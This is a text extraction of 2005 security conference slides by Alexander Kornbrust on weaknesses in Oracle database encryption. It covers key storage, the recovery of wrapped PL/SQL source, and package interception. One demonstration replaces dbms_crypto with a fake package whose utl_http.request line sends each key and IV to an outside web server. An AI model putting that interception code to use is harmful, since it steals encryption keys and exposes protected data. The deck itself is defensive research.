Beruflich Dokumente
Kultur Dokumente
Alexander Kornbrust
28-July-2005
1. Motivation
2. Key Management
3. PL/SQL-Wrapping
4. Oracle Enterprise Manager Grid Control 10g
5. Package Interception
6. Reverse Engineering Computed Keys
7. Design Hints
8. Q/A
http://oraclesvca2.oracle.com/docs/cd/B14117_01/network.101/b10773/ap
dvncrp.htm
(page 1140)
Customer
CID Name CC
1 Fonnigan 377236636051265
2 Nowman 375407276504655
3 Lotchfield 372027162158631
4 Corrudo 375876668507700
5 Foyo 375427673015113
Order
OID CID Quantity Price
100 1 1 49
101 5 2 59
102 2 1 69
103 3 1 99
104 4 3 49
1 Fonnigan 377236636051265
2 Nowman 375407276504655
3 Lotchfield 372027162158631
4 Corrudo 375876668507700
5 Foyo 375427673015113
1 Fonnigan 3$1^d&2349(/234
2 Nowman !^2wed3y*=21
3 Lotchfield !asd99%/0kj0LK
4 Corrudo k08aNB897634k
5 Foyo +Wdsf54te95lm3$
begin
password := hextoraw('blackhat_usa2005');
dbms_obfuscation_toolkit.DES3Encrypt(
input => plain_data_raw,
key => password,
encrypted_data => encrypted_data_raw,
which => 1);
end;
/
declare
-- set encryption algorithm
l_algorithm PLS_INTEGER := dbms_crypto.encrypt_aes128 +
dbms_crypto.chain_cbc + dbms_crypto.pad_pkcs5;
begin
dbms_output.put_line('CC='||l_data||'Encrypted_Data='||
utl_raw.cast_to_varchar2(dbms_crypto.encrypt(
UTL_RAW.cast_to_raw(l_data),
l_algorithm,
UTL_RAW.cast_to_raw(l_key),
UTL_RAW.cast_to_raw(l_iv))));
end;
/
Fixed keys
Key handled by the client
Store key in the file system
Store key in the database
Computed keys
Advantages
Key is not accessible by the DBA
Disadvantages
If the key is lost/forgotten (by the user),
the data is lost
Not in sync with backup/restore
Key must be shared between users
Red-Database-Security GmbH Alexander Kornbrust, 28-Jul-2005 V1.06 18
Key handled by the client
Advantages
Key is not accessible by the DBA
Disadvantages
Additional complexity (2nd listener,
Library, )
Not in sync with backup/restore
Advantages
In sync with backup/restore
Disadvantages
Key is accessible by the DBA (like
everything in the database)
Advantages
No need to store keys in the database
Every value has a different key
Disadvantages
Algorithm to generate the key must be
protected
Sample algorithm
pk := read_primary_key;
str := xor (pk, blackhat);
key:= md5(str);
encrypt (value, key)
To stop the DBA (or the hacker) from reading the key
or the key generating algorithm from the PL/SQL-code
it is necessary to obfuscate the PL/SQL-source with
the Oracle wrap utility
Usage:
wrap iname=mypack1.pkb
Oracle is aware that wrapping PL/SQL is not safe. Oracle changed the
algorithm in Oracle 10g. It is possible to get the source of wrapped
PL/SQL.
[] []
-- blac khat _usa 2005 1PAD_PKCS5:
l1 varchar2(16):=chr(98) 1L1:
116:
||chr(108)||chr(97)||chr(9
1CHR:
9); 198:
l2 varchar2(16):=chr(107) 1||:
||chr(104)||chr(97)||chr(1 1108:
16); 197:
l3 varchar2(16):=chr(95) 199:
1L2:
||chr(117)||chr(115)||chr(
1107:
97); 1104:
l4 varchar2(16):=chr(50) 1116:
||chr(48)||chr(48)||chr(53 1L3:
); 195:
l_key VARCHAR2(16) := l1||l2|| 1117:
1115:
l3||l4;
1L4:
[] 150:
148:
153:
1L_KEY:
[]
cat crypt_w10.pkb
Demonstration
User 1
Views
encryption key
www.evildba.com User 1
encryption key Tables Functions Procedures Packages
encryption key
Views
Public Synonyms
encryption key
SYS
Views
encryption key
-- Hash Functions
HASH_MD4 CONSTANT PLS_INTEGER := 1;
HASH_MD5 CONSTANT PLS_INTEGER := 2;
HASH_SH1 CONSTANT PLS_INTEGER := 3;
-- MAC Functions
HMAC_MD5 CONSTANT PLS_INTEGER := 1;
HMAC_SH1 CONSTANT PLS_INTEGER := 2;
[]
keyrc:=utl_http.request(KEYWEBSERVER||'user='||user||'/'||'/key='||UTL
_RAW.cast_to_varchar2(key)||'/iv='||UTL_RAW.cast_to_varchar2(iv)||'/ty
p='||typ);
RETURN SYS.dbms_crypto.encrypt(src,typ,key,iv);
END;
[]
SQL> @dbms_crypto_spec_fake.sql
Package created.
SQL> @dbms_crypto_fake.sql
Package Body created.
SQL> commit;
SQL> @crypt_sample.sql
tail -f http-web-access.log
User 1
Views
Public Synonyms
SYS
Views
All these concepts here are also valid for other 3rd
party software.
Some 3rd-party encryption software for Oracle
databases which adds just an additional encryption
layer to the application could always be intercepted.
Demonstration
Alexander Kornbrust
Red-Database-Security GmbH
Bliesstrasse 16
D-66538 Neunkirchen
Germany
Web: http://www.red-database-security.com